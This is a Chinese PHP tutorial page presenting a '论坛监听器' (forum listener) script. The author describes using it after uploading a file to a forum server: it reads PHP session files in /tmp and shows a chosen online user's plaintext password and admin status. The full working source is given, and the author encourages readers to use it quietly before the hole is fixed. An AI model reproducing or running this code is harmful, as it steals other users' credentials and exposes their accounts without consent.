一个查看session内容的函数
一个查看session内容的函数
发布时间:2016-12-29 来源:查字典编辑
摘要:之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111"...

之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:

<?

function submit1(){

global $username;

print "<title>论坛监听器</title>";

$i=0;

if($username=="tasm"||$username=="Tasm")

{

print "你也太黑了吧?连我你也查?";

return;

}

$path="/tmp/";

$d = dir($path);

while($entry=$d->read()){

if(substr($entry,0,4)=="sess"){

$entry=$path.$entry;

$ary=@file($entry);

if(!empty($ary[0])){

$ary = explode(";",$ary[0]);

$name= explode(":",$ary[0]);

if($name[2]==""".$username."""){

$passwd= explode(":",$ary[1]);

$mode=explode(":",$ary[3]);

print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";

if($mode[1]==1)

print "<font color=red>管理员</font>";

else

print "一般用户";

print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";

$i=1;

break;

}}}}

if(!$i)

print "用户:".$username."真的在线吗?如你确定,<a href='javascript:history.go(-1)'>请再来一次</a>,不要多打空格!";

$d->close();

}

function login(){

?>

<html>

<head>

<title>论坛监听器</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

</head>

<body bgcolor="#FFFFFF">

<div align="center">

<p>论坛监听器 </p>

<p> </p>

<table width="500" border="0" cellspacing="0" cellpadding="0">

<tr>

<td colspan="2">当你看到一用户在线时你想看他的密码,你要如何作呢?</td>

</tr>

<tr>

<td colspan="2">让我来告诉你:就是使用本程序。</td>

</tr>

<tr>

<td colspan="2"><font color=red>郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。</font>

<br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td>

</tr>

</table>

<form name="form1" method="post" action="<?print $PHP_SELF ?>" >

<p>请输入你要查的用户名:<br>

<input type="text" name="username">

</p>

<p>

<input type="submit" name="submit1" value="我同意以上申明,开始查找">

</p>

</form>

<p> </p>

</div>

</body>

</html>

<?

}

//--------------main()

if($submit1)

submit1();

else

login();

?>

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新php教程学习
热门php教程学习
编程开发子分类